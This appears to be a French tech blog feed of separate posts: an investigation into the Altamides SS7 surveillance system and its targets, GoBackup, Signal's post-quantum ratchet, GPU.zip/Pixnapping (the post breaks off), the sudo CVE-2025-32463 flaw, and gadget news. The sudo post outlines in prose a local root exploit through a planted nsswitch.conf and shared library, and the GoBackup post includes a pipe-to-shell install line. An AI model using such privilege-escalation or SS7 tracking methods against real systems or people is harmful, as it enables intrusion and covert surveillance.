Direction 1984, l’année où Josef Fuchs, jeune ingénieur autrichien de Siemens fraîchement débarqué de son Tyrol natal, pose ses valises à Jakarta pour ce qui devait être une mission de trois mois. Il doit installer des systèmes de télécommunications pour le tout nouveau aéroport de Cengkareng. L’Indonésie représente son dernier contrat avec Siemens après huit ans de bons et loyaux services.

Sauf que Fuchs tombe amoureux du pays, de sa culture, et de ses possibilités infinies. En 1989, fidèle à ses racines européennes, il retourne en Allemagne de l’Est juste après la chute du Mur pour monter une boîte et une école. Le projet est un succès qui perdure encore aujourd’hui, mais l’appel de l’Asie reste plus fort.

Le 1er janvier 1995, Fuchs reçoit un fax décisif d’un ami indonésien : “La dérégulation est arrivée. Tu viens ?” Quatre jours plus tard, le 5 janvier, il embarque direction Jakarta. Cette fois, c’est pour bosser chez Telkomsel, l’un des plus gros opérateurs télécoms indonésiens qui émerge de cette nouvelle ère de libéralisation du marché.

Et c’est là, dans les entrailles de Telkomsel, que Fuchs comprend. Il passe ses journées à plonger dans les réseaux téléphoniques indonésiens et voit passer des millions de signaux de communication entre les opérateurs du monde entier. Tous transitent par le même protocole ancestral : SS7, pour Signalling System 7.

Développé par AT&T en 1975 et standardisé en 1980 , SS7 représente le système nerveux des télécommunications mondiales. Concrètement, quand vous appelez quelqu’un à l’étranger, c’est SS7 qui fait transiter l’appel d’un opérateur à l’autre. Quand vous recevez un SMS en vacances au bout du monde, c’est SS7 qui route le message. Le système est omniprésent, invisible, et surtout terriblement obsolète.

Le souci c’est que SS7 n’a jamais été conçu pour être sécurisé. À l’époque de sa création, seuls les opérateurs télécoms publics y avaient accès et on leur faisait une confiance aveugle. Donc pas de vérification d’identité forte, pas de chiffrement costaud, rien. Une confiance naïve qui date d’une ère où Internet n’existait pas encore.

Fuchs réalise le potentiel colossal de cette faiblesse structurelle et fonde en 1999 First Wap avec Pascal Lalanne, ce Français dont on ne sait presque rien encore aujourd’hui. L’association Fuchs-Lalanne est un duo Franco-Autrichien redoutable : l’un apporte l’expertise technique accumulée chez Siemens et Telkomsel, l’autre la vision business et les connexions en Asie du Sud-Est.

First Wap démarre initialement dans la messagerie électronique par SMS, un service qui cartonne en Asie où les téléphones portables se multiplient à une vitesse folle. Mais en 2000, la bulle Internet explose et tout le secteur tech vacille. Lalanne quitte alors le navire en 2004 , revend ses parts et disparaît ensuite complètement des radars. Depuis vingt ans, c’est silence radio total. Aujourd’hui, on sait juste qu’il s’est reconverti dans l’écologie et a dirigé un sanctuaire naturel à Lombok, en Indonésie. Un virage à 180 degrés.

Mais Fuchs, lui, continue. Et il a une idée qui va révolutionner le marché de la surveillance.

Début des années 2000, Fuchs et son équipe créent alors Altamides. Le nom signifie Advanced Location Tracking and Mobile Information and Deception System. L’idée c’est d’exploiter SS7 pour faire croire au réseau télécom que vous êtes un opérateur légitime. Cela permet de localiser n’importe quel téléphone en temps réel, d’intercepter des SMS, d’écouter des appels, et même de pirater WhatsApp (oui, je vous explique tout après).

Pas besoin d’infecter le téléphone de la victime comme avec Pegasus ou un logiciel espion complexe qui coûte des millions. Non, Altamides opère au niveau du réseau télécom lui-même , ce qui le rend plus discret, plus simple à déployer, et surtout ça fonctionne partout dans le monde sans exception.

Techniquement parlant, First Wap loue des Global Titles (des adresses réseau utilisées par le protocole SS7) auprès d’opérateurs complaisants, notamment Mobilkom Liechtenstein . Ces adresses leur permettent d’envoyer des requêtes de localisation qui semblent parfaitement légitimes aux yeux des réseaux télécoms mondiaux. Le système ne peut tout simplement pas faire la différence.

Pour vous la faire simple, si votre téléphone est allumé, Altamides peut vous trouver où que vous soyez sur la planète. Et vous ne vous en rendrez jamais compte. Aucune trace sur votre appareil, aucun signe d’infection, aucune batterie qui chauffe bizarrement… C’est l’outil d’espionnage parfait.

L’enquête de Lighthouse Reports permet de mettre la main sur 1,5 million d’enregistrements de tracking récupérés sur le dark web. On parle ici de plus de 14 000 numéros uniques espionnés dans 168 pays entre 2007 et 2014. Mais le vrai chiffre est probablement bien plus élevé puisque l’archive ne représente qu’une fraction de l’activité totale d’Altamides.

Plus c’est violet, plus y’a de cibles. L’Indonésie, et le Nigeria sont particulièrement touchés

Et leur tableau de chasse est hallucinant…

Gianluigi Nuzzi, journaliste d’investigation italien spécialisé dans les affaires vaticanes, publie en mai 2012 son livre explosif “Sua Santità” (Sa Sainteté : Les papiers secrets de Benoît XVI). L’ouvrage révèle des documents confidentiels montrant corruption, luttes de pouvoir et opacité financière au cœur du Vatican. C’est le début du scandale “Vatileaks”.

Et quelques heures seulement après la sortie du bouquin, son téléphone se retrouve tracké par Altamides. Ainsi, pendant que la police vaticane recherche désespérément sa source, quelqu’un d’autre suit Nuzzi à la trace via son smartphone. Les requêtes Altamides tombent d’abord manuellement et irrégulièrement, puis deviennent automatiques à partir du 22 mai. Toutes les heures, à la minute près, soit près de 200 localisations en une semaine.

Le tracking montre Nuzzi à Milan près de son ancien appartement, sur l’autoroute en direction de Rome, dans le centre historique près de la fontaine de Trevi, à l’aéroport et chaque déplacement est méticuleusement consigné.

Quelqu’un voulait savoir s’il rencontrait sa source et où.

Le 23 mai 2012, cinq jours après le début de la surveillance, la gendarmerie vaticane arrête Paolo Gabriele, le majordome personnel du pape depuis 2006. L’homme de 46 ans avait un accès privilégié au bureau privé de Benoît XVI et utilisait le photocopieur du bureau partagé avec les deux secrétaires papaux pour copier documents et lettres confidentielles marquées “à détruire”. Il transmettait ensuite ces copies à Nuzzi lors de rencontres nocturnes dignes d’un thriller hollywoodien à base de longs trajets en voiture pour s’assurer qu’ils n’étaient pas suivis, avec des rencontres dans un appartement vide avec une seule chaise où attendait la source au nom de code “Maria”.

Le 24 mai, le lendemain de l’arrestation de Gabriele, le tracking de Nuzzi s’arrête net. Mission accomplie ? Les documents internes révèlent que la société britannique KCS Group, revendeur d’Altamides, avait présenté le système à des “gens du V.” (le Vatican) à Milan quelques jours avant l’arrestation. La présentation incluait les cartes de déplacement de Nuzzi en temps réel. Le Vatican n’a jamais répondu aux questions des journalistes sur cette affaire.

Paolo Gabriele sera condamné à 18 mois de détention pour vol aggravé. Il dira avoir agi pour dénoncer le “mal et la corruption” qu’il voyait autour du pape, manipulé par son entourage. Benoît XVI le graciera après quelques mois et Gabriele décédera en novembre 2020 à 54 ans d’une longue maladie.

Autre cible, Patrick Karegeya, ancien chef des renseignements extérieurs du Rwanda et bras droit de Paul Kagame, vit en exil forcé en Afrique du Sud depuis 2007. Après avoir aidé Kagame à prendre le pouvoir en 1994, il est tombé en disgrâce, emprisonné deux fois pour “insubordination”, et a fui pour échapper à un sort pire encore. Avec le Général Kayumba Nyamwasa (ancien chef d’état-major), il fonde le Rwanda National Congress, principal mouvement d’opposition en exil.

L’archive d’Altamides montre qu’en janvier 2012, le téléphone d’Emile Rutagengwa, chauffeur et garde du corps de Karegeya, est tracké à plusieurs reprises. En mai, c’est Rosette Nyamwasa, l’épouse du Général, qui devient une cible. Quelqu’un cartographie méthodiquement l’entourage des deux opposants.

Le soir du 31 décembre 2013, Karegeya a rendez-vous au luxueux hôtel Michelangelo Towers de Sandton, le quartier d’affaires huppé de Johannesburg, avec Apollo Kiririsi Gafaranga, un homme d’affaires rwandais qu’il connaît depuis l’époque où il dirigeait les services secrets. À 19h46, Karegeya envoie un dernier message rassurant à son neveu David Batenga. Tout va bien, il est avec Apollo.

Le 1er janvier 2014 vers 17h30, le personnel de l’hôtel découvre Karegeya étranglé dans la chambre 905, une serviette ensanglantée et une corde retrouvées dans le coffre-fort de la chambre. Apollo Kiririsi a disparu et a déjà pris un vol pour Kigali. La surveillance Altamides a précédé cet assassinat de 18 mois.

Dans les jours suivant le meurtre, des officiels rwandais se réjouissent publiquement. La ministre des Affaires étrangères Louise Mushikiwabo tweete : “Ce n’est pas comment tu commences qui compte, c’est comment tu finis. Cet homme s’est déclaré ennemi de mon gouvernement et de mon pays. Vous attendez de la pitié ?” Le ministre de la Défense James Kabarebe est encore plus brutal : “Quand tu choisis d’être un chien, tu meurs comme un chien.”

Kagame lui-même déclare publiquement quelques jours plus tard : “Toute personne encore en vie qui complote contre le Rwanda, qui qu’elle soit, paiera le prix. Les conséquences sont les conséquences.” En 2019, un juge sud africain révèle que “des liens étroits existent entre les suspects et le gouvernement rwandais actuel”. Mais aucun des suspects n’a jamais été arrêté et continuent de vivre tranquillement au Rwanda.

Vous savez, ce script bash de backup que vous avez écrit en 2018 et que vous n’osez plus toucher ? Celui avec les 150 lignes de mysqldump + tar + gzip + aws s3 cp qui marche à moitié et que vous relancez manuellement quand il plante ?

Hé bien vous allez pouvoir le foutre à la poubelle parce que maintenant y’a GoBackup !

GoBackup c’est un binaire codé en Go qui remplace tous vos scripts de backup maison d’un coup. MySQL, PostgreSQL, MongoDB, Redis, peu importe. Local, FTP, S3, Google Cloud, Azure, peu importe. Vous installez, vous configurez un fichier YAML, et c’est fini.

Ensuite, vous n’aurez plus jamais besoin de retoucher à tout ce bordel.

Avant GoBackup y’avait backup/backup, une gem Ruby qui faisait exactement ce job avec de la sauvegarde automatique, multi-bases, multi-destinations et c’était bien. Sauf que Ruby c’est lourd et les dépendances Ruby c’est l’enfer. Du coup le projet est mort tout doucement. Heureusement, huacnlee, un dev chinois, en a eu marre alors il a tout réécrit en Go. Zéro dépendance externe et un seul binaire compilé (installable aussi avec Brew pour ceux qui sont sous macOS).

Vous pouvez l’installer comme ceci (vérifiez le script) :

curl -sSL https://gobackup.github.io/install | sh

Ou via homebrew comme ceci :

brew install gobackup

Avec GoBackup, vous définissez vos bases de données, vos fichiers à archiver, vos destinations de stockage, votre planning, tout dans un fichier YAML propre et ensuite le binaire gère tout : Compression, chiffrement, upload, rotation des backups, notifications si ça échoue…etc. Bref, tout ce que vous faisiez à la main avec vos scripts pourris.

Et GoBackup est pas juste un CLI (Interface en ligne de commande). C’est un CLI + un daemon + une Web UI + un scheduler. Comme ça vous lancez “gobackup start” et ça tourne en background.

Le daemon surveille alors le planning défini dans votre config et lance les backups automatiquement. Et l’interface web vous permet de voir l’état des backups, les logs, les erreurs.

Avec GoBackup, vous remplacez littéralement 5 outils en un : votre script bash + cron + un monitoring pourri + un truc pour lire les logs + l’interface d’admin que vous avez jamais eu le temps de faire.

Votre config ressemble à ça :

models:
 mon_app:
 compress:
 type: tgz
 databases:
 mon_mysql:
 type: mysql
 host: localhost
 database: ma_base
 username: user
 password: $MYSQL_PASSWORD
 storages:
 mon_s3:
 type: s3
 bucket: mes-backups
 region: eu-west-1
 access_key_id: $AWS_KEY
 secret_access_key: $AWS_SECRET
 schedule:
 every: 1day
 at: "04:05"

Et c’est tout. Avec ce fichier, GoBackup dump votre base MySQL tous les jours à 4h05, compresse en .tar.gz, chiffre si vous voulez, et upload sur S3. Et si ça échoue vous recevez une notif. Et si ça marche vous avez les logs comme ça, pas besoin de surveiller, ni de débugger à 3h du matin parce que le backup a planté et que vous avez perdu 6 mois de données.

Notez quand même que GoBackup fait du backup classique, et pas du backup incrémental intelligent à la Restic ou à la Borg donc si vous avez 500 GB de données à backup tous les jours vous allez peut-être préférer un outil plus sophistiqué mais pour 90% des cas d’usage sysadmin standard, GoBackup suffira largement.

Votre script bash dégeu a eu une belle vie, il peut maintenant partir à la retraite.

Ce petit choc désagréable quand on touche une poignée de porte en hiver, ce crépitement énervant quand on enlève un pull, ou encore ce moment où nos cheveux se dressent tout seuls comme si on venait de toucher une bobine Tesla… Vous l’aurez compris, je déteste l’électricité statique !

Et pourtant, des chercheurs de l’université de Suzhou en Chine viennent de transformer ce phénomène naturel relou en un truc plutôt cool ! En effet, ils ont eu l’idée contre-intuitive de l’amplifier et de l’utiliser.

Et le résultat de leurs recherches, c’est la mise au point d’un tissu intelligent baptisé A-Textile qui transforme votre voix en commandes pour l’IA. Pas de microphone, pas de batterie mais juste du tissu et de l’électricité statique !

En effet, quand vous parlez, l’air vibre et ces vibrations font bouger légèrement les fibres du tissu. Et quand des fibres se frottent les unes aux autres, elles génèrent de minuscules charges électrostatiques. C’est ce qu’on appelle l’effet triboélectrique , c’est à dire le même phénomène qui vous mets une châtaigne en hiver quand vous ouvrez votre voiture.

Sauf qu’ici, au lieu de vous électrocuter bêtement, ces charges sont captées, amplifiées et transformées en signal électrique exploitable. Et ce signal, une IA le lit et le comprend avec une précision de 97,5% d’après l’équipe de Suzhou , et cela peu importe si l’environnement est bruyant ou pas.

Dans le futur, on pourra donc peut-être chuchoter un truc à son pull pour que la clim ou la lumière s’allume. Nos vêtements vont devenir une IHM de plus (Interface Homme Machine) et pour que ça marche, les scientifiques ont conçu une structure multicouche assez élégante. La surface du tissu est recouverte d’un composite fait de nanofleurs de sulfure d’étain en 3D (SnS2, pour les intimes) intégrées dans du caoutchouc de silicone. En dessous, il y a une couche de textile carbonisé à base de graphite qui accumule les charges.

Cette combinaison permet ainsi d’atteindre une tension de sortie de 21 volts et une sensibilité de 1,2 volt par pascal. Pour vous donner une idée, c’est plus puissant que le coup de jus que vous prenez en touchant une poignée de porte. Mais cette fois, c’est utile car le tissu est alors capable de capter les fréquences entre 80 et 900 Hz, ce qui couvre largement la voix humaine. Même un chuchotement ça passe et comme c’est flexible, lavable et qu’on peut le coudre dans une chemise, une veste ou un uniforme de travail, ça devient portable au quotidien.

Les chercheurs ont donc testé le truc dans des scénarios concrets. Ils ont connecté A-Textile à ChatGPT et posé des questions complexes genre “Quelle est la météo aujourd’hui ?” ou “C’est quoi le metaverse ?”. Ils ont même contrôlé des appareils domotiques (allumer/éteindre une lampe, un climatiseur) juste avec la voix et ont demandé à Google Maps de calculer un itinéraire. Ils ont même réussi à générer des recettes de cocktails.

Et tout ça sans toucher un smartphone ni porter d’écouteurs. Juste en parlant normalement à leurs fringues, un peu comme quand vous discutiez avec une chaussette enfilée sur votre main quand vous étiez petit.

Après en bon rabats joie, vous allez me dire : “Ouais mais on a déjà des assistants vocaux partout”. C’est vrai, sauf que là, c’est pas un objet de plus à acheter, à recharger, à synchroniser avec vos autres gadgets. C’est intégré dans ce que vous portez déjà, comme ça au lieu d’ajouter des couches de technologie, on en retire, on simplifie. L’interface disparaît et il ne reste plus que vous et vos vêtements qui comprennent ce que vous dites.

Je me demande si ça va fonctionner pour les gens qui passent leur journée en slip comme certains d’entre vous, mais en tout cas, ça ouvre des perspectives énormes notamment pour les personnes handicapées qui galèrent avec les interfaces tactiles ou vocales classiques. Ou encore pour les gens qui bossent dans des environnements dangereux où sortir un téléphone peut être risqué.

Puis pour ceux qui veulent juste arrêter de jongler entre quinze appareils différents pour faire un truc aussi simple que régler le chauffage ou allumer la TV c’est chouette non ?

Voilà, donc la prochaine fois que vous prendrez un coup de jus en enlevant votre pull, dites vous que bientôt ça vous permettra de commander un Uber Eats ou de lancer Netflix ^^

Source

L’apocalypse de l’informatique quantique, c’est un truc que les experts annoncent régulièrement depuis 30 ans. Et cette fois ça commence à se préciser car si j’en crois Gartner , c’est pour 2029 - 2034 !

C’est le “on verra ça la semaine prochaine” éternel de la sécurité informatique, sauf que pendant que tout le monde rigole nerveusement en se disant on a le temps, Signal, eux s’attaquent sérieusement au sujet. Et il viennent de publier un write-up technique assez long expliquant comment ils ont déjà régler le problème.

Actuellement, seulement 18% des entreprises du Fortune 500 ont des réseaux protégés contre les ordinateurs quantiques donc autant vous dire que pas grand monde n’est prêt. Heureusement, on va tous pouvoir s’inspirer de ce qu’a fait Signal qui a mis au point un nouveau système baptisé SPQR (Sparse Post Quantum Ratchet, que j’imagine être un jeu de mot avec le SPQR romain… ).

Le problème, c’est que la cryptographie post-quantique, c’est pas juste une mise à jour de sécurité comme les autres. Concrètement, les nouvelles clés cryptographiques résistantes aux ordinateurs quantiques (ML-KEM-768, pour les intimes) font 2 272 bytes alors que les anciennes clés ECDH ne sont que de 32 bytes. C’est donc 71 fois plus gros et donc nos échanges chiffrés vont consommer encore plus de bande passante.

Et ça, c’est juste la partie visible du problème car Signal, c’est pas WhatsApp qui peut se permettre de dire “tant pis, on a de la thune, on va juste consommer plus de bande passante”. Non, Signal lui doit fonctionner partout c’est à dire aussi bien sur les vieux téléphones, que sur les réseaux pourris, ou dans les pays où les gouvernements surveillent activement le trafic. Et tout ça en restant plus sécurisé que n’importe quel autre service. C’est pas évident donc…

En 2023, Signal avait déjà fait une première mise à jour post-quantique avec PQXDH . L’idée, c’était de sécuriser la phase d’initialisation des conversations (le fameux handshake) au travers d’une approche hybride. En gros, on garde l’ancienne méthode X25519 et on ajoute un Kyber-1024 par-dessus, comme ça, même si les ordinateurs quantiques cassent l’une des deux protections, l’autre tient encore.

C’est malin, mais bon, ça ne suffisait pas car le handshake, c’est juste le début pour initialiser la conversation. Alors Signal a mis au point un système appelé le “Double Ratchet” qui fait évoluer les clés de chiffrement en permanence. Ainsi, à chaque message envoyé ou reçu, hop, de nouvelles clés sont générées. C’est ce qui donne à Signal ses super-pouvoirs : la forward secrecy (en gros, ça veut dire que si on vous pirate aujourd’hui, on ne peut pas déchiffrer vos vieux messages) et la post-compromise security (si on vous pirate, vous récupérez automatiquement une connexion sécurisée après quelques échanges).

Ce Double Ratchet, c’était une merveille d’ingénierie, sauf que devinez quoi… il repose entièrement sur ECDH, qui sera totalement cassable par les ordinateurs quantiques d’ici quelques années.

Donc il a fallu tout repenser !

Signal a donc ajouté un troisième ratchet au système. Un Triple Ratchet, le SPQR, qui fonctionne en parallèle des deux autres et injecte régulièrement des secrets post-quantiques dans le mélange.

L’astuce géniale, c’est qu’ils utilisent des “erasure codes”. C’est un peu comme les codes de correction d’erreur sur les CD, mais pour reconstituer des clés cryptographiques manquantes. Hé oui parce que sur un réseau merdique (ou surveillé par un vilain méchant gouvernement), des paquets se perdent. Du coup, avec les erasure codes, même si vous loupez quelques messages, vous pouvez quand même reconstituer les clés.

Et pour régler le problème de la taille des clés (vous vous souvenez, l’explosion de la bande passante ?), ils ont parallélisé les échanges de clés comme ça au lieu d’envoyer une grosse clé à chaque message, ils en envoient plusieurs petites en parallèle, réparties sur plusieurs messages. Ainsi, l’impact sur la bande passante reste raisonnable.

Voilà, donc pour résumer Signal a réussi à ajouter une protection post-quantique complète, en maintenant la forward secrecy et la post-compromise security, tout en gérant les environnements asynchrones (quand les gens sont offline), les réseaux pourris et les adversaires actifs. Tout ça avec un impact minimal sur les perfs ! C’est beau non ?

Et le plus beau dans tout ça c’est que pour nous, les utilisateurs rien ne change ! Toute cette complexité technique est totalement invisible. D’ailleurs les entreprises françaises feraient bien de se mettre sur le sujet car le temps passe vite. L’ANSSI a même tiré la sonnette d’alarme et fixé des échéances précises pour que les entreprises se bougent. Les secteurs les plus à risque (banques, santé, infrastructures critiques…) sont en première ligne. En plus quand on sait que les cybercriminels (et la NSA et compagnie) stockent déjà des données chiffrées pour les déchiffrer plus tard avec des ordinateurs quantiques, l’excuse du “on verra plus tard” ne tient plus vraiment la route.

Signal a ouvert totalement son code et publié ses algos et autres formules donc chaque entreprise qui le souhaite peut aller s’en inspirer. Pour une ONG c’est impressionnant ce qu’ils ont réussi là et ça prouve encore une fois qu’en matière de sécurité, il n’y a pas de fatalité.

Juste des choix.

Source

Il y a des bugs qu’on corrige en urgence. Et puis il y a GPU.zip, cette faille que TOUS les fabricants de GPU connaissent depuis mars 2023 et que personne n’a jamais voulu fixer.

Et 2 ans et demi plus tard, des chercheurs viennent de prouver qu’elle permettait de voler nos codes 2FA sous Android en moins de 30 secondes !!

Et devinez quoi ?

Y’a toujours pas de patch !

L’histoire commence donc en septembre 2023. Des chercheurs de l’Université du Texas, Carnegie Mellon, et l’Université de Washington publient GPU.zip , une attaque par canal auxiliaire qui exploite la compression graphique hardware des GPU. Le principe c’est qu’en mesurant le temps de rendu de certaines opérations graphiques, on peut déduire la couleur des pixels affichés à l’écran. Pixel par pixel. Un peu comme prendre une capture d’écran, mais sans permission, bien sûr !

Tous les fabricants de GPU sont donc prévenu dès mars 2023. AMD, Apple, Arm, Intel, Nvidia, Qualcomm. Mais aucun patch n’a pointé le bout de son nez. La position officielle des fabricants de GPU étant que “C’est au software de gérer ça”.

Les navigateurs web colmatent alors la brèche en limitant les iframes cross-origin, mais la faille hardware elle-même n’est jamais corrigée. Trop coûteux. Trop compliqué. Pas leur problème…

Maintenant on fait avance rapide en octobre 2025. Une équipe de 7 chercheurs (UC Berkeley, Carnegie Mellon, Université de Washington) sort Pixnapping , une attaque qui ressuscite GPU.zip sur Android. Le papier sera d’ailleurs présenté à la 32nd ACM Conference on Computer and Communications Security qui a lieue cette semaine à Taipei. Alan Linghao Wang, Ricardo Paccagnella et leurs collègues on réalisé une démo où on voit une application Android malveillante voler des codes 2FA, des messages privés, ou n’importe quelle donnée affichée à l’écran, sans demander la moindre permission système.

Cette année, avec Nano Banana, ChatGPT, Sora, Seedream et j’en passe, on est quand même passé de “Je cherche une image sur le net” à “Tiens, et si je demandais à Google (ou un autre) de créer l’image que je cherche…”. Comme ça, on ne perd plus de temps à en regarder plein pour trouver la meilleure, et surtout on ne se pose plus la question de est-ce que c’est une image sous copyright ? Ou une image mise en ligne sur un site Creative Commons dont la licence libre sera retirée dans quelques années par un cabinet d’avocat véreux spécialisé dans le copyright trolling… et qui viendra ensuite vous réclamer du pognon .

Et tout ce délire de génération d’images ne risque pas de s’arranger, notamment avec Nano Banana (c’est le petit nom de Gemini 2.5 Flash Image, le modèle de génération d’images de Google) que Google vient d’intégrer dans certains de ses services. En effet, très bientôt vous allez pouvoir modifier, remixer, transformer des images directement depuis la recherche Google (AI Mode), Lens, ou directement vos photos !

Vous prenez une photo avec Lens, ensuite, hop, vous ajoutez un petit prompt texte, et l’IA transformera l’image selon vos désirs. Vous pouvez aussi chercher un truc dans Google Search, puis modifier visuellement le résultat à la volée si ça vous amuse.

Vous allez par exemple chercher un canapé bleu marine sur Google Images, tomber sur la photo de vos rêves sauf que le canapé est rouge brique et hop, l’application le passera en bleu marine directement dans les résultats de recherche. Vous pouvez même mixer deux images pour créer quelque chose de nouveau…

C’est chouette techniquement mais philosophiquement, c’est un délire car la frontière entre le réel et le généré va devenir encore plus floue. On va très vite perdre la notion de ce qui existe vraiment car chaque image pourra être un remix à la demande et au final personne ne saura plus ce qui vient d’un vrai appareil photo ou d’un algo.

C’est une nouvelle réalité qui arrive, où le faux et le vrai se mélangent, faisant disparaitre nos repères.

Au niveau de Google Photos, c’est encore plus inquiétant car on va pouvoir fusionner des images perso, créer des collages, ajouter des éléments de certaines photos dans d’autres photos…etc. On va donc pouvoir se créer des souvenirs qui n’ont jamais existé. Votre gamin n’était pas là pour la photo de famille ? Hop, on le rajoute. Un coucher de soleil moyen-bof sur une photo de vacances ? Hop, on le rend épique.

Nos enfants vont donc grandir avec des albums photo mi-réels mi-générés par IA et au bout de quelques années, plus personne ne se souviendra de si c’était vrai ou pas.

Bref, comme je le disais, technologiquement, c’est impressionnant mais on se demande quand même où se trouve la limite entre retouche créative et falsification de notre mémoire ?

J’en sais quelque chose, la mémoire humaine est déjà très fragile. Elle se réécrit à chaque souvenir et même à chaque évocation d’un souvenir…. Alors si en plus on lui file des photos modifiées pour coller à une réalité qu’on fantasme, j’imagine qu’on va tous finir par croire à des événements qui n’ont jamais eu lieu, surtout si ce sont des modifications subtiles, crédibles.

Bref, ces nouveautés liées à Nano Banana sont déployées uniquement aux États-Unis et en Inde pour le moment, ce qui vous laisse un peu de temps pour réfléchir à tout ça et vous préparer à sauter ou pas dans ce délire de réécriture de vos propres souvenirs.

A vous de voir !

Source

La commande sudo que tous les linuxiens connaissent a plus de 40 ans, tout autant d’années d’audits de sécurité, des millions de lignes de code scrutées par des milliers de développeurs au fil des ans et surtout des dizaines de CVE critiques corrigées.

Et pourtant on est jamais à l’abri d’une mauvaise surprise ! En effet, une fonctionnalité ajoutée récemment pour “améliorer” la sécurité a crée un trou béant. Baptisée CVE-2025-32463, cette une faille critique présente dans sudo est même déjà exploitée par des cybercriminels.

Alors qu’est ce qui se passe exactement ? Hé bien en 2023, les développeurs de sudo ajoutent une amélioration dans la version 1.9.14. L’option --chroot (qui permet d’isoler une commande dans une “prison” système) est améliorée pour mieux gérer le “command matching”. Ça part d’une bonne intention, comme toujours mais cela a débouché sur l’une des pires CVE de l’année.

Rich Mirch de Stratascale découvre alors le problème en juin 2025. Ainsi, quand sudo fait un chroot dans un répertoire contrôlé par l’utilisateur, il demande ensuite “qui es-tu ?” via NSS (Name Service Switch, le système qui résout les infos utilisateurs). Sauf que NSS lit ses fichiers de config… dans le chroot. Votre chroot, celui que vous contrôlez. Gloups !

Il suffit alors de placer un faux /etc/nsswitch.conf et une bibliothèque partagée malveillante dans votre répertoire. Sudo fait son petit chroot dedans, charge votre lib pour vérifier qui vous êtes… et hop votre code s’exécute en root. Ainsi, n’importe quel utilisateur local, sans droits sudo préexistants, peut devenir root. C’est con hein ?

C’est tout con à exploiter ! Et le score de cette faille est critique puisqu’on est sur un CVSS de 9.3 / 10. Et comme les PoC (proof of concept) sont disponibles sur Github dans plein de versions différentes (genre celle là ou celle là ), c’est la fête à l’exploitation sauvage !!

Le 29 septembre dernier, la CISA a même ajouté la CVE-2025-32463 au catalogue KEV (Known Exploited Vulnerabilities), ce qui confirme son exploitation dans la nature. Les agences fédérales américaines ont donc jusqu’au 20 octobre 2025 pour patcher.

Donc oui, c’est du sérieux.

Notez que le patch est disponible depuis le 30 juin 2025 . Sudo 1.9.17p1 corrige donc ce problème et la fonctionnalité --chroot est maintenant marquée comme “dépréciée”. Les développeurs ont compris que cette idée était bancale dès le départ.

Donc si vous êtes admin système et que vous n’avez pas encore mis à jour, c’est le moment, les amis !! Les versions vulnérables vont de sudo 1.9.14 à 1.9.17. Les versions antérieures (avant 1.9.14) ne sont pas touchées, car la fonctionnalité n’existait pas. Et les plus récentes (1.9.17p1+) sont patchées. Ouf !

Comme quoi, même le code le plus vénéré par les barbus peut se foirer sur une nouveauté. En tout cas, bien joué à Rich Mirch pour avoir trouvé ça ! Et sincèrement désolé pour les devs qui ont validé ce commit foireux en 2023, qui ont dû s’en vouloir un peu quand même ^^.

Source

– Article invité, rédigé par Vincent Lautier, contient des liens affiliés Amazon –

Salut à tous chers amis geeks distraits ! Aujourd’hui, on va parler d’un objet qui a résolu un de mes plus gros problèmes du quotidien : la perte de mes lunettes. Je n’en porte que depuis quelques mois, et vu le prix que j’y ai mis, et la qualité de déplacements que je fais chaque semaines, les perdre était une angoisse constante. Mais genre vraiment.

Les semaines ont passé, et ce problème s’est amplifié. J’ai maintenant trois paires de lunettes essentielles : mes solaires (parce que le soleil, c’est mal), mes progressives (parce que l’âge, c’est mal aussi) et mes lunettes mi-distance le travail (parce que les écrans H24… bref, vous avez compris).

Trois paires, c’est trois fois plus de chances d’en égarer une. La panique, la perte de temps, le mini-infarctus quand on pense les avoir définitivement perdues sur une aire d’autoroute ou au MacDo à l’autre bout de la France. C’était mon lot quotidien. Jusqu’à ce que je tombe sur l’étui à lunettes connecté FindAll de Satechi . J’en ai acheté trois d’un coup, oui oui. Un pour chaque paire. Et après plusieurs mois d’utilisation intensive, le verdict est sans appel : je ne peux plus m’en passer.

C’est quoi ce truc ?

L’étui Satechi FindAll ressemble à un étui à lunettes classique, mais en plus élégant. Il est pliable, ce qui le rend ultra-plat quand il est vide, et se déplie pour former un prisme rigide qui protège parfaitement vos précieuses binocles. L’extérieur est en cuir vegan, l’intérieur en micro-suède pour ne pas rayer les verres, et la fermeture est magnétique. C’est propre, c’est sobre, ça respire la qualité.

Mais la magie n’est pas là. La magie, c’est que cet étui intègre une puce compatible avec le réseau « Localiser » (Find My) d’Apple. Exactement comme un AirTag, mais directement intégré à l’objet. Fini le bricolage avec un AirTag qui se balade dans l’étui et risque de rayer vos verres. Ici, la technologie est invisible. Et en plus, le truc se recharge en MagSafe, sur n’importe quel chargeur sans fil.

L’installation : 30 secondes chrono

Le jumelage est d’une simplicité enfantine, typique de l’écosystème Apple. Il suffit d’appuyer sur le petit bouton (très discret) de l’étui, d’ouvrir l’application « Localiser » sur son iPhone et de sélectionner « Ajouter un autre objet ». L’appareil est détecté quasi instantanément. Il ne reste plus qu’à lui donner un nom et un emoji pour finaliser la configuration. En moins d’une minute, votre étui est désormais traçable partout dans le monde.

Screenshot

À l’usage, c’est une révolution

Concrètement, cet étui change la donne au quotidien. La fonction que j’utilise le plus est sans conteste l’alerte d’oubli, qui met fin au fameux « Oups, j’ai oublié ». Si je pars d’un restaurant ou du bureau en laissant mon étui derrière moi, je reçois une notification sur mon iPhone avant même d’avoir atteint la porte. Il est aussi possible de faire sonner l’étui assez fort (90 dB) pour le repérer facilement. Enfin, si vous les oubliez vraiment quelque part en ville, le vaste réseau « Localiser » prend le relais, en signalant de manière anonyme et sécurisée la dernière position connue de l’étui sur une carte dès qu’un autre appareil Apple passe à proximité. J’utilise ces étuis depuis plusieurs mois, ça m’a été vraiment utile deux fois, à chaque fois j’avais oublié mes lunettes chez de la famille. Rien de grave donc, mais j’ai été rassuré tout de suite.

Autonomie et recharge ne sont pas un problème.

On pourrait craindre de devoir recharger un énième gadget toutes les semaines. Que nenni ! Satechi annonce une autonomie allant jusqu’à 8 mois. Après plusieurs mois d’utilisation, je n’ai toujours pas eu à les recharger. Enfin, c’est pas tout à fait exact. En réalité je n’en sais rien, car comme je peux les charger sur mes chargeurs MagSafe (aimantés ou non), je les pose de temps en temps, aléatoirement sur mon chargeur d’iPhone, et sans vraiment m’en préoccuper, je les recharge régulièrement, ça n’est même pas un sujet.

